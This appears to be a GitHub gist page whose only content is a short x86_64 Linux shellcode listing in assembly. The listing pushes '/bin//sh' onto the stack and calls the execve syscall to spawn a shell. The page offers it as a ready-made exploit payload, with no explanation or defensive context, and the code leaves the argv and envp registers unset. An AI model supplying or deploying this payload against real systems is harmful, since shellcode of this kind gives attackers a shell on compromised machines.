Skip to content

Instantly share code, notes, and snippets.

@procinger
Created October 22, 2018 18:22
Show Gist options
  • Save procinger/ce0f67393fec11ba7191ce7370144693 to your computer and use it in GitHub Desktop.
Save procinger/ce0f67393fec11ba7191ce7370144693 to your computer and use it in GitHub Desktop.
GNU/Linux x86_64 shellcode
section .text
global _start
_start:
xor rax, rax
push rax
mov al, 0x3b
mov rbx, 68732f2f6e69622fH
push rbx
mov rdi, rsp
syscall
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment